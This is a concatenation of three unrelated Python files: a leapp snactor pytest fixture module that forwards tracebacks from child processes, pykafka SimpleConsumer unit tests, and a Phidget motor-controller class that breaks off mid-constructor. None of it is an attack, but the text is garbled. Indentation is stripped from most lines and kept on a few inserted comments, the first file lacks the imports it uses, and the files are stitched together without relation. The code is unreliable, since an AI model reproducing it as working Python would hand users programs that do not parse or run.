from leapp.utils.repository import find_repository_basedir
PY27 = sys.version_info[:2] == (2, 7)
PY36 = sys.version_info[:2] == (3, 6)
PY38 = sys.version_info[:2] == (3, 8)
HIGHER = sys.version_info[:2] > (3, 8)
def _patched_name_py27(code, name):
return types.CodeType(
code.co_argcount,
code.co_nlocals,
code.co_stacksize,
code.co_flags,
code.co_code,
code.co_consts,
code.co_names,
code.co_varnames,
code.co_filename,
name,
code.co_firstlineno,
code.co_lnotab,
code.co_freevars,
code.co_cellvars,
)
def _patched_name_py36(code, name):
return types.CodeType(
code.co_argcount,
code.co_kwonlyargcount,
code.co_nlocals,
code.co_stacksize,
code.co_flags,
code.co_code,
code.co_consts,
code.co_names,
code.co_varnames,
code.co_filename,
name,
code.co_firstlineno,
code.co_lnotab,
code.co_freevars,
code.co_cellvars,
)
def _patched_name_py38(code, name):
    # CodeType is immutable; replace() returns a new code object
    return code.replace(co_name=name)
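# _tb_pack/_tb_unpack below turn a traceback into picklable
# (filename, lineno, name) tuples and later rebuild an equivalent traceback by
# compiling throwaway functions that raise at the recorded line numbers, so a
# child process can forward its traceback across the process boundary.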
def _tb_pack(tb):
result = []
while tb is not None:
code = tb.tb_frame.f_code
result.append((code.co_filename, tb.tb_lineno, code.co_name))
tb = tb.tb_next
return result
def _tb_unpack(packed):
previous = '_e'
globs = {previous: StopIteration}
for i, (filename, lineno, name) in enumerate(reversed(packed)):
current = '_%d' % i
eval(compile( # noqa; pylint: disable=eval-used
'%sdef %s(): raise %s()' % ('\n' * (lineno - 1), current, previous), filename, 'exec'), globs)
previous = current
func = globs[current]
if PY27:
func.func_code = _patched_name_py27(func.func_code, name)
elif PY36:
func.__code__ = _patched_name_py36(func.__code__, name)
elif PY38 or HIGHER:
func.__code__ = _patched_name_py38(func.__code__, name)
else:
raise NotImplementedError(
"Traceback forwarding is not implemented for your"
" Python version. Currently supported 2.7, 3.6, 3.8"
" and higher"
)
try:
globs[previous]()
except StopIteration:
globs.clear()
return sys.exc_info()[2].tb_next
class ActorContext(object):
"""
ActorContext is a helper class for testing actors. It helps to eliminate the boilerplate for executing
actors. It provides a set of methods that allow specifying input messages for the actor, executing the
actor and to retrieve messages sent by the actor.
"""
apis = ()
def __init__(self, actor=None):
self._actor = actor
self._messaging = InProcessMessaging()
def set_actor(self, actor):
"""
Internally used method to set the current actor specification object to setup the current actor for the
test function.
:param actor: ActorSpecification instance to use.
:return: None
"""
type(self).name = actor.name + '_feeder'
        # 'consumes' is set to what the actor produces, because the test context consumes the actor's produced messages via 'consume'
type(self).consumes = get_api_models(actor, 'produces')
self._actor = actor
def feed(self, *models):
"""
Feed the messaging model with messages to be available to consume.
:param models: Data in form of model instances to be available for the actor to consume.
:type models: Variable number of instances of classes derived from :py:class:`leapp.models.Model`
:return: None
"""
for model in models:
self._messaging.feed(model, self)
def run(self, config_model=None):
"""
Execute the current actor.
:param config_model: Config model for the actor to consume.
:type config_model: Config model instance derived from :py:class:`leapp.models.Model`
:return: None
"""
config_model_cls = config_model.__class__ if config_model else None
if config_model:
self._messaging.feed(config_model, self)
            # we have to make the messaging system aware of the config model being used, as this is normally done by the workflow
self._messaging._config_models = (config_model_cls,)
# the same as above applies here for actor
self._actor(messaging=self._messaging, config_model=config_model_cls).run()
def messages(self):
"""
Returns raw messages produced by the actor.
:return: list of raw message data dictionaries.
"""
return self._messaging.messages()
def consume(self, *models):
"""
Retrieve messages produced by the actor execution and specified in the actors :py:attr:`produces`
attribute, and filter message types by models.
:param models: Models to use as a filter for the messages to return
:type models: Variable number of the derived classes from :py:class:`leapp.models.Model`
        :return: Tuple of messages produced by the actor, filtered by the given models.
"""
return tuple(self._messaging.consume(self, *models))
@pytest.fixture(scope='module')
def loaded_leapp_repository(request):
"""
    This fixture ensures that the repository for the current test run is fully loaded, including all of
    its linked repositories. This enables running actors and using models, tags, topics, workflows etc.
Additionally loaded_leapp_repository gives you access to a :py:class:`leapp.repository.manager.RepositoryManager`
instance.
:Example:
.. code-block:: python
from leapp.snactor.fixture import loaded_leapp_repository
from leapp.models import ExampleModel, ProcessedExampleModel
def my_repository_library_test(loaded_leapp_repository):
        from leapp.libraries.common import example_lib  # hypothetical shared library module ('global' is a reserved keyword and cannot be imported)
e = ExampleModel(value='Some string')
        result = example_lib.process_function(e)
assert type(result) is ProcessedExampleModel
"""
repository_path = find_repository_basedir(request.module.__file__)
os.environ['LEAPP_CONFIG'] = os.path.join(repository_path, '.leapp', 'leapp.conf')
os.environ['LEAPP_HOSTNAME'] = socket.getfqdn()
context = str(uuid.uuid4())
with get_connection(None):
Execution(context=context, kind='snactor-test-run', configuration='').store()
os.environ["LEAPP_EXECUTION_ID"] = context
manager = getattr(request.session, 'leapp_repository', None)
if not manager:
manager = find_and_scan_repositories(repository_path, include_locals=True)
manager.load(resolve=True)
yield manager
@pytest.fixture(scope='function')
def current_actor_context(loaded_leapp_repository):
"""
    This fixture prepares an environment in which the actor the test belongs to can be executed safely.
    current_actor_context is an instance of :py:class:`leapp.snactor.fixture.ActorContext` and gives access
    to its methods for feeding an actor with input data, running the actor, and retrieving messages produced
    by the actor during its execution.
:Example:
.. code-block:: python
from leapp.snactor.fixture import current_actor_context
from leapp.models import ConsumedExampleModel, ProducedExampleModel
def test_actor_lib_some_function(current_actor_context):
# Feed with messages to be consumable by the actor that is going to be executed.
current_actor_context.feed(ConsumedExampleModel(value='Some random data'))
# Execute the actor
current_actor_context.run()
# Ensure that at least one message is produced
assert current_actor_context.consume(ProducedExampleModel)
# Ensure the value is what we expect
assert current_actor_context.consume(ProducedExampleModel)[0].value == 42
"""
return type('CurrentActorContext', (ActorContext,), {'repository': loaded_leapp_repository, 'name': None})()
@pytest.fixture(scope='function')
def current_actor_libraries(request, loaded_leapp_repository):
"""
    This fixture makes libraries that are private to the actor available only for the scope of the
    test function that uses this fixture.
:Example:
.. code-block:: python
from leapp.snactor.fixture import current_actor_libraries
def test_actor_lib_some_function(current_actor_libraries):
from leapp.libraries.actor import private
assert private.some_function(1) == 42
"""
actor = _get_actor(request.module, loaded_leapp_repository)
with actor.injected_context():
yield actor
def _get_actor(module, repository):
"""
    Looks up the current actor based on the passed module. The requested actor can be deduced from the
    location of the module in which the tests reside, since the actor's full path should be a prefix of
    the path of the current test module.
    :param module: A Python module object containing the tests for the actor to be run.
:param repository: Instance of a :py:class:`leapp.repository.manager.RepositoryManager`
:return: ActorDefinition instance or None, when the actor could not be found
"""
path = os.path.realpath(module.__file__)
for actor in repository.actors:
if path.startswith(os.path.realpath(actor.full_path) + os.sep):
return actor
return None
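# Illustrative layout assumption: for an actor defined under
#   <repository>/actors/myactor/
# its tests typically live in
#   <repository>/actors/myactor/tests/test_myactor.py
# so realpath(test module) starts with realpath(actor.full_path) + os.sep.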
@pytest.fixture(scope='module')
def leapp_forked():
pass
def _execute_test(q, pyfuncitem):
"""
This function is called in the child process from pytest_pyfunc_call via multiprocessing.Process.
:param q: A multiprocessing.Queue object to pass data to the parent process
:param pyfuncitem: pytest item describing the current test function
:return: None
"""
try:
if 'current_actor_context' in pyfuncitem.funcargs:
actor = _get_actor(pyfuncitem.module, pyfuncitem.funcargs['current_actor_context'].repository)
pyfuncitem.funcargs['current_actor_context'].set_actor(actor)
original_pytest_pyfunc_call(pyfuncitem=pyfuncitem)
q.put((True, None))
except BaseException: # noqa; pylint: disable=broad-except
# We need this broad exception to catch all errors and pass them through to the parent process
e_type, e_exc, e_tb = sys.exc_info()
q.put((False, (e_type, e_exc, _tb_pack(e_tb))))
if hasattr(pytest, 'hookimpl'):
@pytest.hookimpl(tryfirst=True)
def pytest_pyfunc_call(pyfuncitem):
"""
This function is a hook for pytest implementing the ability to run the actors in tests safely.
        It will call :py:func:`leapp.snactor.fixture._execute_test` in a child process if the current test uses the
        :py:func:`current_actor_context` or :py:func:`leapp_forked` fixture. Otherwise it falls back to the
        default `pytest_pyfunc_call` implementation.
"""
if not any([arg in pyfuncitem.funcargs for arg in ('current_actor_context', 'leapp_forked')]):
return None
q = Queue()
p = Process(target=_execute_test, args=(q, pyfuncitem))
p.start()
p.join()
        # Ensure we actually got a result; otherwise mark the test as failed
assert not q.empty()
r, e = q.get()
if e:
raise_with_traceback(e[1], _tb_unpack(e[2]))
return r
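# Usage sketch (hypothetical test): requesting either fixture makes the test body
# run in a child process, so crashes cannot take down the pytest session:
#
#   def test_risky_actor_code(leapp_forked):
#       ...  # runs inside a forked process; exceptions are packed and re-raised here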
|
test_simpleconsumer.py
|
from contextlib import contextmanager
import datetime as dt
import json
import mock
import os
import platform
import pytest
import time
import threading
import unittest2
from uuid import uuid4
try:
import gevent
except ImportError:
gevent = None
try:
from pykafka.rdkafka import _rd_kafka # noqa
RDKAFKA = True
except ImportError:
RDKAFKA = False # C extension not built
from pykafka import KafkaClient
from pykafka.simpleconsumer import OwnedPartition, OffsetType
from pykafka.test.utils import get_cluster, stop_cluster
from pykafka.utils.compat import range, iteritems, get_string
kafka_version = os.environ.get('KAFKA_VERSION', '0.8.0')
class TestSimpleConsumer(unittest2.TestCase):
maxDiff = None
USE_RDKAFKA = False
USE_GEVENT = False
@classmethod
def setUpClass(cls):
cls.kafka = get_cluster()
cls.topic_name = uuid4().hex.encode()
cls.kafka.create_topic(cls.topic_name, 3, 2)
cls.total_msgs = 1000
cls.client = KafkaClient(cls.kafka.brokers, broker_version=kafka_version)
cls.prod = cls.client.topics[cls.topic_name].get_producer(
min_queued_messages=1
)
cls.after_earliest = dt.datetime.now() + dt.timedelta(seconds=1)
for i in range(cls.total_msgs):
cls.prod.produce('msg {i}'.format(i=i).encode())
@classmethod
def tearDownClass(cls):
stop_cluster(cls.kafka)
@contextmanager
def _get_simple_consumer(self, **kwargs):
topic = self.client.topics[self.topic_name]
consumer = topic.get_simple_consumer(
use_rdkafka=self.USE_RDKAFKA, **kwargs)
try:
yield consumer
finally:
consumer.stop()
def test_consume(self):
"""Test consuming all messages in topic"""
# This uses a fairly long timeout to allow the test to pass on an
# oversubscribed test cluster
with self._get_simple_consumer(consumer_timeout_ms=30000) as consumer:
count = 0
for msg in consumer:
self.assertIsNotNone(msg.value)
count += 1
if count == self.total_msgs:
# We don't want to wait for StopIteration, given the long
# timeout set above
break
        self.assertEqual(count, self.total_msgs)
def test_unblock_event(self):
"""A call to consume() should return when unblock_event is set()
        To make consume() block indefinitely, all messages in the topic must first
        be consumed and the consumer timeout must be set to -1.
"""
topic = self.client.topics[self.topic_name]
consumer = topic.get_simple_consumer(use_rdkafka=self.USE_RDKAFKA, consumer_timeout_ms=-1)
# Consume all messages in the topic
count = 0
for _ in consumer:
count += 1
if count == self.total_msgs:
break
unblock_event = consumer._cluster.handler.Event()
consume_thread = threading.Thread(target=consumer.consume, kwargs={'unblock_event': unblock_event})
consume_thread.start()
unblock_event.set()
consume_thread.join(30)
self.assertFalse(consume_thread.is_alive())
@staticmethod
def _convert_offsets(offset_responses):
"""Helper function to translate Offset(Fetch)PartitionResponse
Calls like consumer.fetch_offsets() and earliest_available_offsets()
return lists of OffsetPartitionResponses. These hold the next offset
to be consumed, whereas consumer.held_offsets returns the latest
consumed offset. This translates them to facilitate comparisons.
"""
if isinstance(offset_responses, dict):
offset_responses = iteritems(offset_responses)
f1 = lambda off: OffsetType.EARLIEST if off == 0 else off - 1 # noqa
f2 = lambda off: off[0] if isinstance(off, list) else off # noqa
return {partition_id: f1(f2(offset_response.offset))
for partition_id, offset_response in offset_responses}
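    # Illustrative example (assumed values; FakeResponse is a hypothetical stand-in
    # for OffsetPartitionResponse): a partition whose next offset to consume is 5
    # has last-consumed offset 4, while a fresh partition maps to EARLIEST:
    #   _convert_offsets({0: FakeResponse(offset=[5]), 1: FakeResponse(offset=[0])})
    #   -> {0: 4, 1: OffsetType.EARLIEST}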
def test_offset_commit(self):
"""Check fetched offsets match pre-commit internal state"""
with self._get_simple_consumer(
consumer_group=b'test_offset_commit') as consumer:
[consumer.consume() for _ in range(100)]
offsets_committed = consumer.held_offsets
consumer.commit_offsets()
offsets_fetched = self._convert_offsets(consumer.fetch_offsets())
            self.assertEqual(offsets_fetched, offsets_committed)
def test_offset_commit_override(self):
"""Check fetched offsets match committed offsets"""
with self._get_simple_consumer(
consumer_group=b'test_offset_commit') as consumer:
[consumer.consume() for _ in range(100)]
offset = 69
offsets_committed = [(p, offset) for p in consumer.partitions.values()]
consumer.commit_offsets(partition_offsets=offsets_committed)
offsets_fetched = self._convert_offsets(consumer.fetch_offsets())
offsets_committed = {p.id: offset - 1 for p in consumer.partitions.values()}
            self.assertEqual(offsets_fetched, offsets_committed)
def test_offset_resume(self):
"""Check resumed internal state matches committed offsets"""
with self._get_simple_consumer(
consumer_group=b'test_offset_resume') as consumer:
[consumer.consume() for _ in range(100)]
offsets_committed = consumer.held_offsets
consumer.commit_offsets()
with self._get_simple_consumer(
consumer_group=b'test_offset_resume') as consumer:
            self.assertEqual(consumer.held_offsets, offsets_committed)
def test_reset_offset_on_start(self):
"""Try starting from LATEST and EARLIEST offsets"""
with self._get_simple_consumer(
auto_offset_reset=OffsetType.EARLIEST,
reset_offset_on_start=True) as consumer:
earliest_offs = self._convert_offsets(
consumer.topic.earliest_available_offsets())
            self.assertEqual(earliest_offs, consumer.held_offsets)
self.assertIsNotNone(consumer.consume())
with self._get_simple_consumer(
auto_offset_reset=OffsetType.LATEST,
reset_offset_on_start=True,
consumer_timeout_ms=500) as consumer:
latest_offs = self._convert_offsets(
consumer.topic.latest_available_offsets())
            self.assertEqual(latest_offs, consumer.held_offsets)
self.assertIsNone(consumer.consume(block=False))
difference = sum(latest_offs[i] - earliest_offs[i]
if earliest_offs[i] >= 0 else latest_offs[i] + 1
if latest_offs[i] >= 0 else 0
for i in latest_offs)
self.assertEqual(difference, self.total_msgs)
def test_reset_offsets_timestamp(self):
"""Test resetting to user-provided timestamps"""
with self._get_simple_consumer(
auto_offset_reset=OffsetType.EARLIEST) as consumer:
# Find us a non-empty partition "target_part"
part_id, latest_offset = next(
(p, res.offset[0])
for p, res in consumer.topic.latest_available_offsets().items()
if res.offset[0] > 0)
target_part = consumer.partitions[part_id]
# Set all other partitions to LATEST, to ensure that any consume()
# calls read from target_part
partition_offsets = {
p: OffsetType.LATEST for p in consumer.partitions.values()}
partition_offsets[target_part] = self.after_earliest
consumer.reset_offsets(partition_offsets.items())
# expect EARLIEST here since our test partition has a single log segment
self.assertEqual(consumer.held_offsets[part_id], OffsetType.EARLIEST)
msg = consumer.consume()
self.assertEqual(msg.offset, 0)
def test_reset_offsets(self):
"""Test resetting to user-provided offsets"""
with self._get_simple_consumer(
auto_offset_reset=OffsetType.EARLIEST) as consumer:
# Find us a non-empty partition "target_part"
part_id, latest_offset = next(
(p, res.offset[0])
for p, res in consumer.topic.latest_available_offsets().items()
if res.offset[0] > 0)
target_part = consumer.partitions[part_id]
# Set all other partitions to LATEST, to ensure that any consume()
# calls read from target_part
partition_offsets = {
p: OffsetType.LATEST for p in consumer.partitions.values()}
new_offset = latest_offset - 5
partition_offsets[target_part] = new_offset
consumer.reset_offsets(partition_offsets.items())
self.assertEqual(consumer.held_offsets[part_id], new_offset)
msg = consumer.consume()
self.assertEqual(msg.offset, new_offset + 1)
# Invalid offsets should get overwritten as per auto_offset_reset
partition_offsets[target_part] = latest_offset + 5 # invalid!
consumer.reset_offsets(partition_offsets.items())
# SimpleConsumer's fetcher thread will detect the invalid offset
# and reset it immediately. RdKafkaSimpleConsumer however will
# only get to write the valid offset upon a call to consume():
msg = consumer.consume()
expected_offset = target_part.earliest_available_offset()
self.assertEqual(msg.offset, expected_offset)
self.assertEqual(consumer.held_offsets[part_id], expected_offset)
@pytest.mark.xfail
def test_update_cluster(self):
"""Check that the consumer can initiate cluster updates"""
if self.USE_RDKAFKA:
pytest.skip("Unresolved crashes")
with self._get_simple_consumer() as consumer:
self.assertIsNotNone(consumer.consume())
for broker in self.client.brokers.values():
broker._connection.disconnect()
# The consumer fetcher thread should prompt broker reconnection
t_start = time.time()
timeout = 40. if self.USE_GEVENT else 20.
try:
for broker in self.client.brokers.values():
while not broker._connection.connected:
time.sleep(.1)
self.assertTrue(time.time() - t_start < timeout,
msg="Broker reconnect failed.")
finally:
# Make sure further tests don't get confused
consumer._update()
# If the fetcher thread fell over during the cluster update
# process, we'd get an exception here:
self.assertIsNotNone(consumer.consume())
@pytest.mark.xfail
def test_consumer_lag(self):
"""Ensure that after consuming the entire topic, lag is 0"""
with self._get_simple_consumer(consumer_group=b"test_lag_group",
consumer_timeout_ms=1000) as consumer:
while True:
message = consumer.consume()
if message is None:
break
consumer.commit_offsets()
latest_offsets = {p_id: res.offset[0]
for p_id, res
in iteritems(consumer.topic.latest_available_offsets())}
current_offsets = {p_id: res.offset for p_id, res in consumer.fetch_offsets()}
self.assertEqual(current_offsets, latest_offsets)
@pytest.mark.skipif(platform.python_implementation() == "PyPy" or gevent is None,
reason="Unresolved crashes")
class TestGEventSimpleConsumer(TestSimpleConsumer):
USE_GEVENT = True
class TestOwnedPartition(unittest2.TestCase):
def test_partition_saves_offset(self):
offset = 20
msgval = "test"
partition = mock.MagicMock()
op = OwnedPartition(partition)
op.next_offset = offset
message = mock.Mock()
message.value = msgval
message.offset = offset
op.enqueue_messages([message])
self.assertEqual(op.message_count, 1)
ret_message = op.consume()
self.assertEqual(op.last_offset_consumed, message.offset)
self.assertEqual(op.next_offset, message.offset + 1)
self.assertNotEqual(ret_message, None)
self.assertEqual(ret_message.value, msgval)
def test_partition_rejects_old_message(self):
last_offset = 400
op = OwnedPartition(None)
op.last_offset_consumed = last_offset
message = mock.Mock()
message.value = "test"
message.offset = 20
op.enqueue_messages([message])
self.assertEqual(op.message_count, 0)
op.consume()
self.assertEqual(op.last_offset_consumed, last_offset)
def test_compacted_topic_partition_rejects_old_message_after_initial(self):
last_offset = 400
message1 = mock.Mock()
message1.value = "first-test"
message1.partition_id = 0
message1.offset = last_offset
partition = mock.MagicMock()
partition.id = 0
op = OwnedPartition(partition, compacted_topic=True)
op.enqueue_messages([message1])
self.assertEqual(op.message_count, 1)
op.consume()
self.assertEqual(op.message_count, 0)
self.assertEqual(op.last_offset_consumed, last_offset)
message2 = mock.Mock()
message2.value = "test"
message2.partition_id = 0
message2.offset = 20
op.enqueue_messages([message2])
self.assertEqual(op.message_count, 0)
op.consume()
self.assertEqual(op.last_offset_consumed, last_offset)
def test_partition_consume_empty_queue(self):
op = OwnedPartition(None)
message = op.consume()
self.assertEqual(message, None)
def test_partition_offset_commit_request(self):
topic = mock.Mock()
topic.name = "test_topic"
partition = mock.Mock()
partition.topic = topic
partition.id = 12345
op = OwnedPartition(partition)
op.last_offset_consumed = 200
request = op.build_offset_commit_request()
self.assertEqual(request.topic_name, topic.name)
self.assertEqual(request.partition_id, partition.id)
self.assertEqual(request.offset, op.last_offset_consumed + 1)
parsed_metadata = json.loads(get_string(request.metadata))
self.assertEqual(parsed_metadata["consumer_id"], '')
self.assertTrue(bool(parsed_metadata["hostname"]))
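        # Background note: Kafka's convention is that the committed offset is the
        # offset of the *next* message to consume, hence last_offset_consumed + 1 above.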
def test_partition_offset_fetch_request(self):
topic = mock.Mock()
topic.name = "test_topic"
partition = mock.Mock()
partition.topic = topic
partition.id = 12345
op = OwnedPartition(partition)
request = op.build_offset_fetch_request()
self.assertEqual(request.topic_name, topic.name)
self.assertEqual(request.partition_id, partition.id)
def test_partition_offset_counters(self):
res = mock.Mock()
res.offset = 400
op = OwnedPartition(None)
op.set_offset(res.offset)
self.assertEqual(op.last_offset_consumed, res.offset)
self.assertEqual(op.next_offset, res.offset + 1)
if __name__ == "__main__":
unittest2.main()
|
PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class.py
|
# -*- coding: utf-8 -*-
'''
Reuben Brewer, Ph.D.
reuben.brewer@gmail.com
www.reubotics.com
Apache 2 License
Software Revision D, 11/12/2021
Verified working on: Python 2.7, 3.8 for Windows 8.1, 10 64-bit and Raspberry Pi Buster (no Mac testing yet).
'''
__author__ = 'reuben.brewer'
from LowPassFilter_ReubenPython2and3Class import *
import os, sys, platform
import time, datetime
import math
import collections
import inspect #To enable 'TellWhichFileWereIn'
import threading
import traceback
###############
if sys.version_info[0] < 3:
from Tkinter import * #Python 2
import tkFont
import ttk
else:
from tkinter import * #Python 3
import tkinter.font as tkFont #Python 3
from tkinter import ttk
###############
###############
if sys.version_info[0] < 3:
import Queue # Python 2
else:
import queue as Queue # Python 3
###############
###############
if sys.version_info[0] < 3:
from builtins import raw_input as input
else:
from future.builtins import input as input
############### #"sudo pip3 install future" (Python 3) AND "sudo pip install future" (Python 2)
###########################################################
###########################################################
#To install Phidget22, enter folder "Phidget22Python_1.0.0.20190107\Phidget22Python" and type "python setup.py install"
from Phidget22.PhidgetException import *
from Phidget22.Phidget import *
from Phidget22.Devices.Log import *
from Phidget22.LogLevel import *
from Phidget22.Devices.TemperatureSensor import *
from Phidget22.Devices.BLDCMotor import *
from Phidget22.Devices.MotorPositionController import *
###########################################################
###########################################################
#http://stackoverflow.com/questions/19087515/subclassing-tkinter-to-create-a-custom-widget
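#Example instantiation (illustrative sketch; the serial number, hub port, and
#device ID below are placeholders for your own hardware):
#
#   motor = PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class(dict([
#       ("VINT_DesiredSerialNumber", 123456),
#       ("VINT_DesiredPortNumber", 0),
#       ("DesiredDeviceID", 123),
#       ("ControlMode", "velocity")]))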
class PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class(Frame): #Subclass the Tkinter Frame
##########################################################################################################
##########################################################################################################
def __init__(self, setup_dict):
print("#################### PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ starting. ####################")
self.EXIT_PROGRAM_FLAG = 0
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = -1
self.EnableInternal_MyPrint_Flag = 0
self.ThisIsFirstTimeEverAttachingFlag = 1
self.device_connected_flag = 0
self.MainThread_still_running_flag = 0
##########################################
##########################################
if platform.system() == "Linux":
if "raspberrypi" in platform.uname(): #os.uname() doesn't work in windows
self.my_platform = "pi"
else:
self.my_platform = "linux"
elif platform.system() == "Windows":
self.my_platform = "windows"
elif platform.system() == "Darwin":
self.my_platform = "mac"
else:
self.my_platform = "other"
print("The OS platform is: " + self.my_platform)
##########################################
##########################################
##########################################
##########################################
if "GUIparametersDict" in setup_dict:
self.GUIparametersDict = setup_dict["GUIparametersDict"]
##########################################
if "USE_GUI_FLAG" in self.GUIparametersDict:
self.USE_GUI_FLAG = self.PassThrough0and1values_ExitProgramOtherwise("USE_GUI_FLAG", self.GUIparametersDict["USE_GUI_FLAG"])
else:
self.USE_GUI_FLAG = 0
print("USE_GUI_FLAG = " + str(self.USE_GUI_FLAG))
##########################################
##########################################
if "root" in self.GUIparametersDict:
self.root = self.GUIparametersDict["root"]
self.RootIsOwnedExternallyFlag = 1
else:
self.root = None
self.RootIsOwnedExternallyFlag = 0
print("RootIsOwnedExternallyFlag = " + str(self.RootIsOwnedExternallyFlag))
##########################################
##########################################
if "GUI_RootAfterCallbackInterval_Milliseconds" in self.GUIparametersDict:
self.GUI_RootAfterCallbackInterval_Milliseconds = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_RootAfterCallbackInterval_Milliseconds", self.GUIparametersDict["GUI_RootAfterCallbackInterval_Milliseconds"], 0.0, 1000.0))
else:
self.GUI_RootAfterCallbackInterval_Milliseconds = 30
print("GUI_RootAfterCallbackInterval_Milliseconds = " + str(self.GUI_RootAfterCallbackInterval_Milliseconds))
##########################################
##########################################
if "EnableInternal_MyPrint_Flag" in self.GUIparametersDict:
self.EnableInternal_MyPrint_Flag = self.PassThrough0and1values_ExitProgramOtherwise("EnableInternal_MyPrint_Flag", self.GUIparametersDict["EnableInternal_MyPrint_Flag"])
else:
self.EnableInternal_MyPrint_Flag = 0
print("EnableInternal_MyPrint_Flag: " + str(self.EnableInternal_MyPrint_Flag))
##########################################
##########################################
if "PrintToConsoleFlag" in self.GUIparametersDict:
self.PrintToConsoleFlag = self.PassThrough0and1values_ExitProgramOtherwise("PrintToConsoleFlag", self.GUIparametersDict["PrintToConsoleFlag"])
else:
self.PrintToConsoleFlag = 1
print("PrintToConsoleFlag: " + str(self.PrintToConsoleFlag))
##########################################
##########################################
if "NumberOfPrintLines" in self.GUIparametersDict:
self.NumberOfPrintLines = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("NumberOfPrintLines", self.GUIparametersDict["NumberOfPrintLines"], 0.0, 50.0))
else:
self.NumberOfPrintLines = 10
print("NumberOfPrintLines = " + str(self.NumberOfPrintLines))
##########################################
##########################################
if "UseBorderAroundThisGuiObjectFlag" in self.GUIparametersDict:
self.UseBorderAroundThisGuiObjectFlag = self.PassThrough0and1values_ExitProgramOtherwise("UseBorderAroundThisGuiObjectFlag", self.GUIparametersDict["UseBorderAroundThisGuiObjectFlag"])
else:
self.UseBorderAroundThisGuiObjectFlag = 0
print("UseBorderAroundThisGuiObjectFlag: " + str(self.UseBorderAroundThisGuiObjectFlag))
##########################################
##########################################
if "GUI_ROW" in self.GUIparametersDict:
self.GUI_ROW = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_ROW", self.GUIparametersDict["GUI_ROW"], 0.0, 1000.0))
else:
self.GUI_ROW = 0
print("GUI_ROW = " + str(self.GUI_ROW))
##########################################
##########################################
if "GUI_COLUMN" in self.GUIparametersDict:
self.GUI_COLUMN = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_COLUMN", self.GUIparametersDict["GUI_COLUMN"], 0.0, 1000.0))
else:
self.GUI_COLUMN = 0
print("GUI_COLUMN = " + str(self.GUI_COLUMN))
##########################################
##########################################
if "GUI_PADX" in self.GUIparametersDict:
self.GUI_PADX = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_PADX", self.GUIparametersDict["GUI_PADX"], 0.0, 1000.0))
else:
self.GUI_PADX = 0
print("GUI_PADX = " + str(self.GUI_PADX))
##########################################
##########################################
if "GUI_PADY" in self.GUIparametersDict:
self.GUI_PADY = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_PADY", self.GUIparametersDict["GUI_PADY"], 0.0, 1000.0))
else:
self.GUI_PADY = 0
print("GUI_PADY = " + str(self.GUI_PADY))
##########################################
##########################################
if "GUI_ROWSPAN" in self.GUIparametersDict:
self.GUI_ROWSPAN = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_ROWSPAN", self.GUIparametersDict["GUI_ROWSPAN"], 0.0, 1000.0))
else:
self.GUI_ROWSPAN = 0
print("GUI_ROWSPAN = " + str(self.GUI_ROWSPAN))
##########################################
##########################################
if "GUI_COLUMNSPAN" in self.GUIparametersDict:
self.GUI_COLUMNSPAN = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_COLUMNSPAN", self.GUIparametersDict["GUI_COLUMNSPAN"], 0.0, 1000.0))
else:
self.GUI_COLUMNSPAN = 0
print("GUI_COLUMNSPAN = " + str(self.GUI_COLUMNSPAN))
##########################################
else:
self.GUIparametersDict = dict()
self.USE_GUI_FLAG = 0
print("No GUIparametersDict present, setting USE_GUI_FLAG = " + str(self.USE_GUI_FLAG))
print("GUIparametersDict = " + str(self.GUIparametersDict))
##########################################
##########################################
##########################################
if "UsePhidgetsLoggingInternalToThisClassObjectFlag" in setup_dict:
self.UsePhidgetsLoggingInternalToThisClassObjectFlag = self.PassThrough0and1values_ExitProgramOtherwise("UsePhidgetsLoggingInternalToThisClassObjectFlag", setup_dict["UsePhidgetsLoggingInternalToThisClassObjectFlag"])
else:
self.UsePhidgetsLoggingInternalToThisClassObjectFlag = 1
print("UsePhidgetsLoggingInternalToThisClassObjectFlag: " + str(self.UsePhidgetsLoggingInternalToThisClassObjectFlag))
##########################################
##########################################
if "WaitForAttached_TimeoutDuration_Milliseconds" in setup_dict:
self.WaitForAttached_TimeoutDuration_Milliseconds = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("WaitForAttached_TimeoutDuration_Milliseconds", setup_dict["WaitForAttached_TimeoutDuration_Milliseconds"], 0.0, 60000.0))
else:
self.WaitForAttached_TimeoutDuration_Milliseconds = 5000
print("WaitForAttached_TimeoutDuration_Milliseconds: " + str(self.WaitForAttached_TimeoutDuration_Milliseconds))
##########################################
#########################################################
if "VINT_DesiredSerialNumber" in setup_dict:
try:
self.VINT_DesiredSerialNumber = int(setup_dict["VINT_DesiredSerialNumber"])
except:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR:: VINT_DesiredSerialNumber invalid.")
else:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: Must initialize object with 'VINT_DesiredSerialNumber' argument.")
return
print("VINT_DesiredSerialNumber: " + str(self.VINT_DesiredSerialNumber))
#########################################################
#########################################################
if "VINT_DesiredPortNumber" in setup_dict:
try:
self.VINT_DesiredPortNumber = int(setup_dict["VINT_DesiredPortNumber"])
except:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR:: VINT_DesiredPortNumber invalid.")
else:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: Must initialize object with 'VINT_DesiredPortNumber' argument.")
return
print("VINT_DesiredPortNumber: " + str(self.VINT_DesiredPortNumber))
#########################################################
#########################################################
if "DesiredDeviceID" in setup_dict:
try:
self.DesiredDeviceID = int(setup_dict["DesiredDeviceID"])
except:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: DesiredDeviceID invalid.")
